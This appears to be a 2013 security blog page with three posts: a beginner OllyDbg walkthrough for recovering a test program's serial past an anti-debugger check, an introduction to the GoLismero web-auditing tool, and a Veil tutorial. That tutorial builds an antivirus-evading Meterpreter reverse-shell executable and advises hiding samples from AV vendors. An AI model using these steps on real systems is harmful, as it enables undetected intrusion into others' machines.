Monday, September 30, 2013


Some months ago, I participated in something like a "Hacker Competition" to get a job in a CERT. One of the tests consisted of getting the serial key of a simple program. The organizer sent me an executable called reversing_test.exe

We are going to work with OllyDbg v1.10. You can download this awesome tool from here: OllyDbg v1.10.



You can see its details in the picture below.



The first thing I usually do in these cases is to check if the executable is compressed or not. Some programs pack some of their codes in order to limit our attempt to statically analyze it. To achieve this purpose we are going to use PeID. In the picture below you can see that the program does not detect any compression "Nothing found *". If the file were compressed with UPX for example, the program would advise us about it and we could uncompress it with this tool.



If we click on the "EP Section" bottom, we will see some executable's details.



We can see the R. Size (Raw Size) "400" and the V.Size (Virtual Size) "350" are similar in ".text" . The .text section contains the instructions that the CPU executes and it should be the only section that includes the code. If some day you detect that the R.Size is "0" and the V.Size is "1000" for example, it would be an indicator that the executable is compressed because in the disk it does not have any size (it is packed) and in the memory it has a size (it is unpacked itself).


Now we have the assurance that the file has not been compressed. This is one of the first steps in a static analysis. We are going to make a dynamic analysis with OllyDbg but I want to know if the developer has made an effort in order to try to hide some code. Notice if the executable is packed then we are not going to be able to read a lot of strings within the file. It is possible I will talk about that in future posts...


The next step would be to run the program by double clicking on the executable. After that, we can see that a MS-DOS window is launched and the program requires us to type the serial number. We type a sentence in order to check the program's behavior.


We have not figured out the serial number... It seems logical...


Now, we are going to run OllyDbg. It does not need installation, just download it and uncompress it. When OllyDbg is opened, just load the executable clicking on File -> Open.



Now we can see the binary code. Don't worry, remember this post is focused on beginners. We are going to click on the play button in order to run the executable just loaded in our debugger and check the file behaviour.



The program has started and we can see the firsts strings like "Press ENTER to finish"...

(Please, click on the picture to see the entire details)


But... Something happens... The program doesn't require us to type the serial number like it occurs when we open the application without using a debugger... It's really strange... It's like the program knows about our intentions and it is closed by itself when we try to run it with a debugger tool...



If we reload the file again on OllyDbg, one line of the code draws our attention... The program is calling to the "IsDebuggerPresent" API.



If we seek this API on Microsoft we can see that "This function allows an application to determine whether or not it is being debugged, so that it can modify its behavior".


Ok, the program is closed when it is open within a debugger. There are many options to avoid being detected by this technique... To achieve this purpose we are going to use the "Hide Debugger 1.2.4" plugin. Just download it and uncompress the DLL in the same OllyDbg's folder.


It is necessary to restart OllyDbg in order to work with this plugin. If you click on Plugins tab you can see Hide Debugger plugin. You don't need to do anything else.



We have just installed the plugin to avoid being detected and now, we are going to load and play the executable again. Now the program requires typing the serial number. Great news...



We are going to type a sentence which will be easily recognizable.



If we come back to OllyDbg we can see our sentence in the Arg1.

(Please, click on the picture to see the entire details)


If we continue looking for this sentence through the code we can locate the code below. We can see the String2="28939387", the String1="I'm going to looking for this sentence in OllyDbg now..." and the API call CompareStringA.

We can figure out that the executable is comparing these strings to each other in order for you to check if both have the same value. We can suppose that the string "28939387" is serial number.

(Please, click on the picture to see the entire details)


OllyDbg offers us to copy the value of this line by left clicking on the line we are interested in.



Then, we are going to paste the line's value to the notepad and then, we are going to copy only the "String2" value: 28939387.



In the end, we just need to try paste the value just copied in our program and... Well!!! We have obtained the serial number of our program!!!



This post could be applied to many of the simple programs which have a keygen integrated but it is needed to have more knowledge if you want to crack more complex programs.

This post is focus on show you some techniques using OllyDbg. It is only a game to get more reversing engineer skills to research malware. Please, don't contact me to crack programs, it is illegal... I recommend you use to use free software!!!! :P


Posted on Monday, September 30, 2013 by Javier Nieto

12 comments

Wednesday, September 18, 2013

GoLismero is an open source framework for web auditing which has been recently presented at AppSec EU de OWAP  en Hamburgo. It has been developed by Daniel Garcia Garcia a.k.a cr0hn (@ggdaniel) and Mario Vilas (@Mario_Vilas).



This tool allows you to map a web application and detect vulnerabilities of it.

Also you can manage a lot of security tools like OpenVas, Nikto, DNS recon, robot analyzer... and take their results merged in a single report automatically.

GoLismero has been tested on Windows, Linux, BSD and OS X and it doesn’t have library dependencies, you only need to have Python 2.7.5 installed.

It's really easy to install. Just execute the command below in your Linux machine.
git clone https://github.com/golismero/golismero.git

Also, this project has created a GoLismero VM (based in Kali Linux). You can download here: http://golismero-project.com/downloads/kali-golismero.ova

This VirtualBox Machine includes:

  • OpenVAS installations pre-configured.
  • VirtualBox tools.
  • GoLismero updater.
  • GoLismero stable and develop version.


We have a lot of options to set in order to run GoLismero. Have a look at the picture below. If you want more information about an option, just type this command.
python golismero.py --help

Like the one mentioned above, GoLismero can manage some well known applications like Nikto. With the command below, we can see all the plugins available to use.
python golismero.py --plugin-list

Here, I'm going to describe all plugins included with this tool.

-= Import plugins =-
  • csv:  Import the results of a Nikto scan in CSV format.
  • xml:  Import the results of an OpenVAS scan.

-= Recon plugins =-
  • default_error_page:  Identifies default error pages for most commonly used web servers.
  • dns_analyzer:  Tries to find hidden subdomains by enumerating them using the DNS protocol.
  • dns_subdomains_bruteforcer:  Tries to find hidden subdomains by brute force.
  • dns_zone_transfer:  Tries to make a DNS zone transfer.
  • fingerprint_os:  Fingerprinter of server operating systems.
  • fingerprint_web:  Fingerprinter of web servers.
  • robots:  Analyzes robots.txt files and extracts their links.
  • spider:  Web spider plugin. Without it, GoLismero can't crawl web sites.
  • suspicious_url:  Flags suspicious words in URLs.
  • theharvester:  Integration with theHarvester (https://code.google.com/p/theharvester/).

-= Scan plugins =-
  • brute_directories:  Tries to discover hidden folders by brute force:  www.site.com/folder/ -> www.site.com/folder2 www.site.com/folder3 ...
  • brute_extensions:  Tries to discover hidden files by brute force:  www.site.com/index.php -> www.site.com/index.php.old
  • brute_permutations:  Tries to discover hidden files by bruteforcing the extension:  www.site.com/index.php -> www.site.com/index.php2
  • brute_predictables:  Tries to discover hidden files at predictable locations. For example: (Apache) www.site.com/error_log
  • brute_prefixes:  Tries to discover hidden files by bruteforcing prefixes:  www.site.com/index.php -> www.site.com/~index.php
  • brute_suffixes:  Tries to discover hidden files by bruteforcing suffixes:  www.site.com/index.php -> www.site.com/index2.php
  • nikto:  Run the Nikto scanner and import the results.
  • openvas:  Run the OpenVAS scanner and import the results

-= Report plugins =-
  • html:  Plugin to generate HTML reports.
  • text:  Creates text reports in files or on screen.

-= UI plugins =-
  • console:  Console user interface.
  • disabled:  Empty user interface.

Also you can create your own plugins. You can obtain more information about its plugin's API here.

If you want to know more details about some plugins you can get it typing --plugin-info plugin_name. Have a look at the commands and pictures below:
python golismero.py --plugin-info openvas
If you would like to integrate GoLismero with OpenVAS you should set the correct IP, port, user and password of your OpenVAS installation.

python golismero.py --plugin-info nikto

After this brief introduction of the GoLismero's details, I want to show you an example of how to work with this tool.

First of all,  take care with this tool. If you launch it with the default options, the tool begins to search other subdomains and try to attack them. You might want to audit all your infraestructure and if it's your goal, that is ok, if not, use the "--forbid-subdomains" option.

Ok. Let's go.
sudo python golismero.py -d theharvester,openvas,dns* --forbid-subdomains --audit-name MyProject -o MyProject.html www.example.es

Details about this command:

  • With "-d" option, we are telling to GoLismero that we don't want to use theharvester, openvas and the rest of plugins which begin with "dns".
  • With "--forbid-subdomains" we avoid attacking other subdomains. We are going to focus in only one target.
  • With "--audit-name MyProject" we are going to save the results in a database named MyProject.db.
  • With "-o MyProject.html" we are going to generate a HTML report.

Note: If you want to set which plugins you want use instead of which plugins you don't want to use, you can use "-e" option.

 

Then, you only need to wait until the scan is finished. Depending on the website you are auditing or the command you have typed, you need to wait more or less time. Be warned, getting the report can take some time, so, I recommend launching the scans, then doing something else like having a relaxing cup of coffee while the scan is working ... ;)

When the scan is finished, just open the HTML report with your favourite web browser.


We can see the details of the report filtered by Vulnerability...



... or filtered by resource.


The picture below shows us a vulnerability found on the web site we have just audited.



In my opinion GoLismero is a great tool which is currently growing.

The next features of GoLismero will be:
  • Integration with Nmap, SQLMap, Metasploit and many other tools.
  • Web UI.
  • Export results in PDF format.


Posted on Wednesday, September 18, 2013 by Javier Nieto

No comments

Monday, September 02, 2013

Veil is a awesome tool developed by Chris Truncer @ChrisTruncer, Mike Wright @TheMightyShiv and The Grayhound @the_grayhound specifically designed for Kali Linux which has the goal of:

  • Bypass common AV solutions used.
  • Get the payloads from Metasploit framework, and get the new ones in the future Metasploit releases.
  • Try to create each payload as random as possible.

Some days ago Veil v2.0.4 was Released. I'm want to talk about it and give some examples about how to bypass severals anti-virus.

The main changes in this version is:

  • x64 compatibility – They have updated their setup script in order to make Veil compatible with both x86 and x64 versions.
  • Update Feature – Now Veil has an update function. Now we can update Veil either the command line or menu.

There are tutorials available at http://www.veil-evasion.com The framework can be downloaded from Chris' github at https://github.com/ChrisTruncer/Veil/ or at https://github.com/ChrisTruncer/Veil/archive/master.zip.

If you want to install Veil in your own environment you can use the commands below:
wget https://github.com/ChrisTruncer/Veil/archive/master.zip
unzip master.zip
cd Veil-master/setup
cd ..
./setup.sh 

If you want to work with Kali Linux, with the commands below it will be enough.
apt-get update
apt-get install veil 

I had a  bad experience with the second option and I prefer to install Veil with the first one using "setup.sh" script.

The veil's developers don't want to submit any payload to www.virustotal.com to avoid distribution to the anti-virus vendors. There are an alternative: vscan.novirusthanks.org. That site scan the suspicious files for malware detection and offer us the option below: "Do not distribute the sample".

When Veil is recently installed, just run it with the command below:
./Veil

By default in Kali Linux, we can see 18 payloads ready to be used. Now we can type "use".



Here, Veil offers us more information about the payloads. In this case I chose python/b64VirtualAlloc typing "18"



When our payload is loaded type "generate". You can set some specifics options, but in this post, we are going to try the default options.



Now we are going to select msfvenom typing "1"



After that we need to type some details:

  • Enter metasploit payload: "windows/meterpreter/reverse_tcp"
  • Enter value for 'LHOST', [tab] for local IP: "192.168.69.69"
  • Enter value for 'LPORT': "443"

Then it's necessary to wait while the shellcode is been generated.



You need to press enter and then Veil requests us the name of our payload. In this case "undetectable"



We are going to use Pyinstaller. It will create a .exe installable. For this, we are going to type "1"



In the end, we can get our executable at "/root/Veil-master/output/compiled/"



Now, we have our executable and we are going to submit it to vscan.novirusthanks.org. Please, remember to check "Do not distribute the sample". If you choose to don't check this options or you decide to submit the executable to www.virustotal.com your file will be investigated and maybe it will be recognized by some anti-virus vendors.


You can see in the picture below any of the anti-virus vendors have detected our file as malicious. We have got a rate detection of 0%!!!!



If you prefer to use the CLI instead of a menu, you can generate the same payload we have just created with the command below.

./Veil.py -l python -p b64VirtualAlloc -o undetectable --msfpayload windows/meterpreter/reverse_tcp --msfoptions LHOST=192.168.69.69 LPORT=443


Posted on Monday, September 02, 2013 by Javier Nieto

6 comments